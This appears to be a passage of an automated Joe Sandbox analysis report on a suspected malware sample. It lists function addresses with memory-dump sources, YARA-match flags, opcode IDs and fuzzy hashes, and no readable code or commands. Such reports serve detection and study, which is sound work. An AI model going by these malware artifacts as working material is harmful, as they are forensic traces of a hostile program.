                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: b077483ebbe41559666eb24632921f170fd341de44e0cb4593afb61e9b0962fb
                                                                                                                                                                                                                                                                        • Instruction ID: 3de76f9d274b52e90d2ef9e87ec8d3366dafd7d2e10265ff4f1f4711345407d1
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b077483ebbe41559666eb24632921f170fd341de44e0cb4593afb61e9b0962fb
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7601B1F570171147D720AE51A9C0B27B2B86FC0748F19443EEC4457342DB7DEC29869E
                                                                                                                                                                                                                                                                        Function 00470083 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716537575.0000000000470000.00000040.00001000.00020000.00000000.sdmp, Offset: 00470000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_470000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                                                                                        • Instruction ID: 55b3357babd73c7d63067b68b75eda0394ea81547d8670197819266f4d1506e2
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E3112AB2341100AFD754DE55DC81FE673EAEB89320B29806AE908CB316D67AE842C764
                                                                                                                                                                                                                                                                        Function 00710D90 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                                                                                                        • Instruction ID: 0d86cffbea82b53fe675f2a5388cedad65503f072fbff0fa05e60698cc6132c7
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7F01F272B006008FDF21DF68D804BEA33E5FB86306F0544A4D90A972C6E3B8A9C58BC0
                                                                                                                                                                                                                                                                        Function 00428D93 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 7d6529698e20a6c769e7980251b0ca5e132cff0518f497c1ab8b00d6e4c79072
                                                                                                                                                                                                                                                                        • Instruction ID: 34e981112378c59cf45707eac27e4188cbaca79d234523b47ecff1cb0040ee73
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7d6529698e20a6c769e7980251b0ca5e132cff0518f497c1ab8b00d6e4c79072
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 59016DB9C00624EFEF00AF55DC01B9E77B6AB0A324F0414A5E508BB392D731ED10CB95
                                                                                                                                                                                                                                                                        Function 00738FA0 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 6136a0a86494c0451f0a8cc20dd56009850612ffaa73c5348e62317f6daaf908
                                                                                                                                                                                                                                                                        • Instruction ID: 416163330716df38245bf4347807bdfd0ebb9064b661d12f5678d1507e01f6a0
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6136a0a86494c0451f0a8cc20dd56009850612ffaa73c5348e62317f6daaf908
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 97F0DAB2D00614DFDF40EA98CC06E9A77B9BF0A320F080490F508FB261DA36FD508B96
                                                                                                                                                                                                                                                                        Function 0074CCFA Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 7c88d2dd0d5ef8fcb1920e32d35327158bdbdf587074639a4ccac7672161239f
                                                                                                                                                                                                                                                                        • Instruction ID: 3bf5c7375b4945d28089649ae12b6221bc3288972dc64d60e63df592cf9a44f8
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7c88d2dd0d5ef8fcb1920e32d35327158bdbdf587074639a4ccac7672161239f
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B0E0DFEFE556601393188A214D01126B193BFD763172AE4748E8673706EA35AC0B81D4
                                                                                                                                                                                                                                                                        Function 0043CA93 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 3b41fa5205d4ae5a3fd68479d9a62f5c8f3548fe329d4af70c97534e327c91f5
                                                                                                                                                                                                                                                                        • Instruction ID: 76115147780e5b0d0309e2a0309811062aead7e9691d40ac881d7231c88a4ab0
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3b41fa5205d4ae5a3fd68479d9a62f5c8f3548fe329d4af70c97534e327c91f5
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 23E0D8FFD556600397548A235C02226B1936BDA628B1AB8788E9673707EA359C0741D8
                                                                                                                                                                                                                                                                        Function 007332ED Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 03be019c7f84eab5680fd60e5a6e0a4c14760194c7c122451d5e0e1049be607d
                                                                                                                                                                                                                                                                        • Instruction ID: fc80778cd1c7dda6cd4550bba5988e30f40cc60b3e6593792e524e76bf9ff5dc
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 03be019c7f84eab5680fd60e5a6e0a4c14760194c7c122451d5e0e1049be607d
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 76E0E575C11110EFDB107B51EC02A1C7AB2AB62302B471135E448A7231EF365A2AEB5D
                                                                                                                                                                                                                                                                        Function 00423086 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: d3e382a35f6a7edaa88fbd4097d4fd738d9cf468eed6d2bef4b4d717b7d72e8c
                                                                                                                                                                                                                                                                        • Instruction ID: 8488e0a8640df04fcf481087a0a0e2354c4894f8e99b76394d31cfc5082ce78b
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d3e382a35f6a7edaa88fbd4097d4fd738d9cf468eed6d2bef4b4d717b7d72e8c
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6BE01279C11100BFDE046B11FC0161CBA72B76630BF46213AE40873232EF35A436A75D
                                                                                                                                                                                                                                                                        Function 00736E96 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 627599c8012a5de30bed4bcc5cdf041527b351da4d44e435234bf5fd0dbcc5af
                                                                                                                                                                                                                                                                        • Instruction ID: 4b01befefd95af8d9f86ef20581f0273fd01e56afb6de13ef707199e357cfaf6
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 627599c8012a5de30bed4bcc5cdf041527b351da4d44e435234bf5fd0dbcc5af
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5BD02B1984C823931F190D14811013597132A03300B8E839088C07F743C51ACC0B12D4
                                                                                                                                                                                                                                                                        Function 00427AD3 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 9580c00f8d87a75d1cefbcc58e71a064fbff43a3de15b5db8def70aaa11ec223
                                                                                                                                                                                                                                                                        • Instruction ID: 6e3621e5ba52bd1720ea54ad2d17b774c7841a8325dce5c8bd5a6b1d086829a3
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9580c00f8d87a75d1cefbcc58e71a064fbff43a3de15b5db8def70aaa11ec223
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 36D0C279815910CBDB047F01EC0216A73F4AB03389F04007CE88123263DB39D8288E8E
                                                                                                                                                                                                                                                                        Function 00739F40 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: b699e929166f3269f3c0af6cf854a66d2adcb16623502ccf6fa341cc05aeb82f
                                                                                                                                                                                                                                                                        • Instruction ID: f936f75c28aff45e7e5a90233e76c396396f850400af72d052505152adfe5083
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b699e929166f3269f3c0af6cf854a66d2adcb16623502ccf6fa341cc05aeb82f
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 39D05E72858244EBD9409B00DC02B6AB3B9FF4A714F041524B988B10A1E726EA288757
                                                                                                                                                                                                                                                                        Function 0072C8BA Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: a8f9aa8a7fabceb26a773c801b96314e67806ff88a01327c7cabaf7e1195b6db
                                                                                                                                                                                                                                                                        • Instruction ID: 37f14cdf6497b575d2c06cd584a2f5d2e2440587faefa6f38c3bedc463c8a9e8
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a8f9aa8a7fabceb26a773c801b96314e67806ff88a01327c7cabaf7e1195b6db
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D8D0127BF821008B9B099F14DD43B756A63A7C770470CE1348905D3348EE3DD45A800E
                                                                                                                                                                                                                                                                        Function 0041C653 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 49296dab776a215db2218e93475e1eaebcd65e3db626a3e2e0a563717988ad4a
                                                                                                                                                                                                                                                                        • Instruction ID: f6de81edf4edbd36f0565e031b671f89904ab193cb181933f1b50bd017efe36b
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 49296dab776a215db2218e93475e1eaebcd65e3db626a3e2e0a563717988ad4a
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C9D0127BF9210047DA099F11DD43775666393C770870DE1398805E3348DE3CD41A840E
                                                                                                                                                                                                                                                                        Function 0071C264 Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 77b0f56a3a3e1bb8ea188a0444bb5e5b9921abf6ae6ebc879750073e405f2179
                                                                                                                                                                                                                                                                        • Instruction ID: c40df4f40b565673574f117b3b393b79a76a3f9a491c552766a49f6821d64b0d
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 77b0f56a3a3e1bb8ea188a0444bb5e5b9921abf6ae6ebc879750073e405f2179
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ACC012BCA4C10187D7088F10EC05735B636E797A01F14E125C441232A5C630A403860C
                                                                                                                                                                                                                                                                        Function 0040BFFD Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 77b0f56a3a3e1bb8ea188a0444bb5e5b9921abf6ae6ebc879750073e405f2179
                                                                                                                                                                                                                                                                        • Instruction ID: c40df4f40b565673574f117b3b393b79a76a3f9a491c552766a49f6821d64b0d
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 77b0f56a3a3e1bb8ea188a0444bb5e5b9921abf6ae6ebc879750073e405f2179
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ACC012BCA4C10187D7088F10EC05735B636E797A01F14E125C441232A5C630A403860C
                                                                                                                                                                                                                                                                        Function 00737D1A Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 341987432dce9904f649f917b7ed575f0bb4bb5c5b4e9ef9425cd867c06a6129
                                                                                                                                                                                                                                                                        • Instruction ID: 72197a89f0db8906162c4e7b1cd8ff8a0044b6389847668ed9cbbad427b51869
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 341987432dce9904f649f917b7ed575f0bb4bb5c5b4e9ef9425cd867c06a6129
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A9B092B1C02C20CB96523F242C068EAB6242E13300F042030E90626242BE3BD26A449F
                                                                                                                                                                                                                                                                        Function 00739AB5 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: f753dbc925eeb97c78fc90efc39af23615c529da2cdf343c0b9dd0ba408761e0
                                                                                                                                                                                                                                                                        • Instruction ID: befaae0d9a7f82cd18c17594d87387b8e72288341b7913c4274c2d377cc7630f
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f753dbc925eeb97c78fc90efc39af23615c529da2cdf343c0b9dd0ba408761e0
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0AB012E0C04500C7D9009F245C05871A23C5707210F003420D008E7102E535D040410E
                                                                                                                                                                                                                                                                        Function 0042984F Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 11edc8d7ae4c917e56862e9043f01123a23c23558e3e2cb29e810181f8f007cd
                                                                                                                                                                                                                                                                        • Instruction ID: 02d06448f02dd76ad61b8ab648816bdf30096f71157e536fee4757e064133957
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 11edc8d7ae4c917e56862e9043f01123a23c23558e3e2cb29e810181f8f007cd
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AEA022F8C0A800C3E800CF20BC02030F23C830B2A8F00303AE00CF3203EA30E0088A0E
                                                                                                                                                                                                                                                                        Function 0074898E Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: a4feeaae0c5d4225290c8f64d1143a34bd66befac27b9bcfb2494fe2660e1556
                                                                                                                                                                                                                                                                        • Instruction ID: 5f90c8482877ae364e78efe8602c82ba5110085f469652caa7ae2d3bb2038f17
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a4feeaae0c5d4225290c8f64d1143a34bd66befac27b9bcfb2494fe2660e1556
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AC900224D4D1008681508F449440470E279930B111F103410900CF3062C310D545455D
                                                                                                                                                                                                                                                                        Function 0074197C Relevance: 36.9, APIs: 1, Strings: 20, Instructions: 154memoryCOMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: AllocString
                                                                                                                                                                                                                                                                        • String ID: $#$/$0$0$4$;$B$B$G$H$J$O$Q$]$^$m$n${$~
                                                                                                                                                                                                                                                                        • API String ID: 2525500382-534244583
                                                                                                                                                                                                                                                                        • Opcode ID: 88941a0f473d950aaf799373c472504fdf4e728c02f445fde5d667b58de91daa
                                                                                                                                                                                                                                                                        • Instruction ID: 5fd3c90c3100725ee596a75e2f28203dd98bda28fdecb6c45d1be7ebc1dd4f52
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 88941a0f473d950aaf799373c472504fdf4e728c02f445fde5d667b58de91daa
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3B81076010CBC289D322C63C881875FBFD15BE7224F188B9DE1F54B3E6D6A98146C767
                                                                                                                                                                                                                                                                        Function 00431715 Relevance: 36.9, APIs: 1, Strings: 20, Instructions: 154memoryCOMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: AllocString
                                                                                                                                                                                                                                                                        • String ID: $#$/$0$0$4$;$B$B$G$H$J$O$Q$]$^$m$n${$~
